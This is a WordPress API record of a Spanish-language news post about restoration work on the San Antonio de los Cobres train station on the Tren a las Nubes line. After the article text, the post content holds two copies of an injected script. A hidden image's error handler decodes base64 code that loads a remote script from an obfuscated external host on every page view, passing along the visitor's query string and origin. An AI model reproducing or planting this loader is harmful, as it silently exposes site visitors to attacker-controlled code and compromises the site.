{"id":3850,"date":"2024-03-11T12:02:18","date_gmt":"2024-03-11T15:02:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3850"},"modified":"2025-08-13T23:58:36","modified_gmt":"2025-08-14T02:58:36","slug":"estacion-de-trenes-de-san-antonio-de-los-cobres-avanza-la-obra-para-su-puesta-en-valor","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3850","title":{"rendered":"Estaci\u00f3n de Trenes de San Antonio de los Cobres: avanza la obra para su puesta en valor"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-035c07ca7ed3015676e41017e0931289\" style=\"background-color:#9c1451\"><em>La obra, que se ejecuta a partir de un convenio entre el Gobierno de Salta y Trenes Argentinos, se encuentra con un 80% de avance. El proyecto potenciar\u00e1 el turismo y a la comunidad de San Antonio de los Cobres, adem\u00e1s de darle un valor agregado al producto Tren a las Nubes.<\/em><\/h5>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, y el presidente del Tren a las Nubes,&nbsp;<strong>Sebasti\u00e1n Vidal<\/strong>, recorrieron la obra de puesta en valor de la Estaci\u00f3n de Trenes de San Antonio de los Cobres que se encuentra en un 80% de avance. La misma se ejecuta a partir de un convenio firmado entre el Gobierno de Salta y Trenes Argentinos Capital Humano.&nbsp;<\/p>\n\n\n\n<p>\u201cEstamos muy contentos de ver el avance de una obra que permitir\u00e1 no s\u00f3lo poner en valor a esta estaci\u00f3n y al Tren a las Nubes sino que potenciar\u00e1 el turismo y beneficiar\u00e1 a la comunidad de San Antonio de los Cobres, ya que habr\u00e1 espacios para artesanos y desarrollo de sus pobladores\u201d, destac\u00f3 el Ministro de Turismo y Deportes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11233-estacion-de-trenes-de-san-antonio-de-los-cobres-avanza-la-obra-para-su-puesta-en-valor.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11233-estacion-de-trenes-de-san-antonio-de-los-cobres-avanza-la-obra-para-su-puesta-en-valor.jpg\" alt=\"Estaci\u00f3n de Trenes de San Antonio de los Cobres: avanza la obra para su puesta en valor\" style=\"width:362px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Por su parte, Vidal manifest\u00f3 que \u201ces un proyecto &nbsp;que inici\u00f3 hace 4 a\u00f1os y est\u00e1 pr\u00f3ximo a finalizar con una obra muy importante para nosotros ya que nos permitir\u00e1 mejorar y jerarquizar el producto Tren a las Nubes en cuanto a la atenci\u00f3n, asistencia y seguridad de los pasajeros\u201d.<\/p>\n\n\n\n<p>\u201cHemos generado con la obra 250 metros lineales de and\u00e9n que no hab\u00eda antes, la plaza tendr\u00e1 iluminaci\u00f3n solar y donde estaciona el tren la misma ser\u00e1 fotovoltaica\u201d, agreg\u00f3 el presidente del Tren a las Nubes.<\/p>\n\n\n\n<p>La restauraci\u00f3n y refuncionalizaci\u00f3n comprende la creaci\u00f3n de una plaza central y paseo ferroviario, d\u00e1rsena de colectivos para 8 micros y playa de maniobra, estacionamiento con capacidad para 50 veh\u00edculos, estacionamientos exclusivos para ambulancias y 24 puestos para artesanos. Tambi\u00e9n se contempla la instalaci\u00f3n de espacios para brindar informaci\u00f3n tur\u00edstica, sala de espera, de primeros auxilios y un espacio gastron\u00f3mico.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11234-estacion-de-trenes-de-san-antonio-de-los-cobres-avanza-la-obra-para-su-puesta-en-valor.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11234-estacion-de-trenes-de-san-antonio-de-los-cobres-avanza-la-obra-para-su-puesta-en-valor.jpg\" alt=\"Estaci\u00f3n de Trenes de San Antonio de los Cobres: avanza la obra para su puesta en valor\" style=\"width:310px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>La estaci\u00f3n se ubica en plena Puna salte\u00f1a, a 3.776 metros sobre el nivel del mar. Forma parte del ramal C-14 \u2013 Huaytiquina que recorren los servicios de carga que unen Argentina con Chile y el Tren a las Nubes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La obra, que se ejecuta a partir de un convenio entre el Gobierno de Salta y Trenes Argentinos, se encuentra con un 80% de avance. El proyecto potenciar\u00e1 el turismo y a la comunidad de San Antonio de los Cobres, adem\u00e1s de darle un valor agregado al producto Tren a las Nubes. El ministro de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3851,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,18],"tags":[],"class_list":{"0":"post-3850","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3850"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3850"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3850\/revisions"}],"predecessor-version":[{"id":6824,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3850\/revisions\/6824"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3851"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}